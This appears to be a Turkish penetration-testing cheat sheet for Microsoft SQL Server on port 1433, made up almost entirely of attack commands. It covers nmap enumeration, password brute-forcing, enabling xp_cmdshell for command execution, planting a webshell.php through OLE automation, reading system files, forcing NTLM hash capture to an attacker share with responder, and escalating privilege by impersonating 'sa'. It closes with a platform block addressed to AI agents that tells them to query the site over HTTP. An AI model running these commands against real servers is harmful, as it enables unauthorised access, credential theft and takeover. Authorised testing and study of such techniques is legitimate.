# MSSQL - 1433 ### Tarama ```bash nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 192.168.1.3 ``` ### Bağlantı ```bash # GUI navicat # Manuel impacket-mssqlclient Administrator:Lab123@192.168.50.18 -windows-auth ``` ### Basit Bilgiler MSSQL sunucusu üzerinde genel bilgileri almak için kullanılır. ```python nmap --script ms-sql-info -p 1433 192.168.1.3 ``` MSSQL sunucusu hakkında NTLM bilgilerini elde etmek için kullanılır. ```python nmap -p 1433 --script ms-sql-ntlm-info --script-args mssql.instance-port=1433 192.168.1.3 ``` ### Brute Force MSSQL sunucusuna şifre kırma saldırısı yapmak için kullanılır. Belirtilen kullanıcı adı ve şifre listelerini kullanarak deneme yapar. ```python nmap -p 1433 --script ms-sql-brute --script-args userdb=/root/Desktop/wordlist/common_users.txt,passdb=/root/Desktop/wordlist/100-common-passwords.txt 192.168.1.3 ``` MSSQL sunucusunda boş şifreleri kontrol etmek için kullanılır. ```python nmap -p 1433 --script ms-sql-empty-password 192.168.1.3 ``` ### Komut Çalıştırma ```bash impacket-mssqlclient Administrator:Pass123@192.168.50.18 -windows-auth EXECUTE sp_configure 'show advanced options', 1; RECONFIGURE; EXECUTE sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXECUTE xp_cmdshell 'whoami'; ``` ### Create File ``` EXECUTE sp_configure 'show advanced options', 1; RECONFIGURE; EXECUTE sp_configure 'Ole Automation Procedures', 1; RECONFIGURE; DECLARE @OLE INT DECLARE @FileID INT EXECUTE sp_OACreate 'Scripting.FileSystemObject', @OLE OUT EXECUTE sp_OAMethod @OLE, 'OpenTextFile', @FileID OUT, 'c:\inetpub\wwwroot\webshell.php', 8, 1 EXECUTE sp_OAMethod @FileID, 'WriteLine', Null, '' EXECUTE sp_OADestroy @FileID EXECUTE sp_OADestroy @OLE GO ``` ### Read File ``` SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents GO ``` ### NTLM Dump ```bash EXEC master..xp_subdirs '\\192.168.1.2\share\' exec master.dbo.xp_dirtree '\\192.168.1.2\shares\deneme' EXEC master..xp_fileexist '\\192.168.1.2\shares\deneme' responder -I tun0 ``` ### Imporsanate ```sql SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE' GO EXECUTE AS LOGIN = 'sa' SELECT SYSTEM_USER SELECT IS_SRVROLEMEMBER('sysadmin') GO ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://yigitsengezer.gitbook.io/siber-guvenlik-notlari/network-service-pentesting/mssql-2313.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.